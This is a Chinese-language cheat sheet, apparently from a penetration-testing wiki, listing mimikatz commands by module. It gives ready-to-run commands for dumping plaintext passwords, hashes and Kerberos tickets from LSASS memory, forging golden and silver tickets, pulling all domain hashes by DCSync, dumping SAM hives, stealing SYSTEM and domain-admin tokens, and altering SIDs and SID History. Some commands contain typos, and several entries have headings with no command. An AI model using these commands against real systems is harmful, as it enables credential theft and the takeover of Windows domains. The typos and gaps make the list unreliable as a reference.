mimikatz

它可以从机器内存中提取明文密码、密码Hash、PIN码和Kerberos票据等。

privilege模块

该模块是用于提权的模块。mimikatz很多模块需要以高权限运行，因此执行高权限操作模块的时候需要先利用privilege模块进行提权。只有用具有管理员权限的窗口执行该命令才能成功，普通用户权限执行该命令会失败。

privilege::debug

sekurlsa模块

该模块提供了一些用来枚举凭据的命令。该模块使用需要高权限。

#只抓取内存中保存的用户明文密码
sekurlsa::wdigest
#只抓取内存中保存的用户Hash
sekurlsaa::msv
#只抓取内存中保存的用户密码Key值
sekurlsa::ekeys
#抓取内存中保存的用户所有凭据
sekurlsa::logonpasswords
#加载dmp文件，并导出其中的明文密码
prodump64.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
#导出lsass.exe进程中所有的票据
sekurlsa::tickets /export

从windows server 2012系统开始，默认情况下，内存中不保存用户的明文密码

kerberos模块

该模块是与kerberos相关的模块

#查看内存中的kerberos TGT
kerberos::tgt
#查看内存中所有的kerberos票据
kerberos::list
#清除票据
kerberos::purge
#将票据注入到内存中
kerberos::ptt xx.kirbi
#黄金票据传递攻击
kerberos::golden /user:要伪造的用户 /domain:域名 /sid:域的sid值 /krbtgt:krbtgt的hash或AESkey /ptt
#白银票据传递攻击
kerberos::golden /user:要伪造的用户 /domain:域名 /sid:域的sid值 /target:服务机器 /service:指定服务，如cifs、ldap /rc4:服务账户的hash /ptt

lsadump模块

该模块是对local security authority(LSA)进行密码抓取的模块

#通过DCSync导出指定用户的hash，格式化输出
lsadump::dcsync /domain:god.org /user:krbtgt /csv
#通过DCSync导出指定用户的密码hash的详细信息
lsadump::dcsync /domain:god.org /user:krbtgt
#通过DCSync导出所有用户的hash
lsadump::dcsync /domain:god.org /all /csv
#读取所有域用户的hash，需要在域控上以管理员权限打开窗口
lsadump::lsa /patch
#从sam.hive和system.hive文件中获得NTLM hash
reg save hklm\\sam sam.hive
reg save hklm\\system system.hive
lsadump::sam /sam:sam.hive /system:system.hive
#从本地SAM文件中读取密码hash
privilege::debug
token::elevate
lsadump::sam

token模块

该模块是与访问令牌相关的模块

#列出当前的token信息
token::whoami
token::whoami /full
#列出当前系统中存在的token，高权限列出的token最全面
token::list
#窃取指定token id的token
token::elevate /id
#窃取system权限的token(默认)
token::elevate /system
#窃取域管理员的token
token::elevate /domainadmin
#窃取企业管理员的token
token::elevate /enterpriseadmin
#窃取本地管理员的token
token::elevate /admin
#窃取Local Service权限的token
token::elevate /localservice
#窃取Network Service权限的token
token::elevate /networkservice
#恢复之前的token
token::revert

sid模块

该模块是与SID相关的模块

#查询指定对象的sid
sid::lookup /name:test
#查询指定sid对应的对象
sid::lookup /sid:S-1-5-21-2952760202-1353902439-2381784089-500
#通过samAccountName属性查询对象的一些信息
sid::query /sam:test
#通过sid查询对象的一些信息
sid::query /sid:S-1-5-21-2952760202-1353902439-2381784089-500
#通过samAccountName属性修改对象的SID
sid::patch
sid::modify /sam:test /new:S-1-5-21-2952760202-1353902439-2381784089-500
#通过sid属性修改对象的SID
sid::patch
sid::modify /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /new:S-1-5-21-2952760202-1353902439-2381784089-511
#通过samAccountName属性给对象添加一个SID History属性

#通过sid属性给对象添加一个SID History属性

#将administrator的sid添加到test的SID History属性中

#清除指定samAccountName对象的SID History属性
sid::clear /sam:test
#清除指定sid对象的SID History属性
sid::clear /sid:

上一页Rubeus 下一页Impacket

这有帮助吗？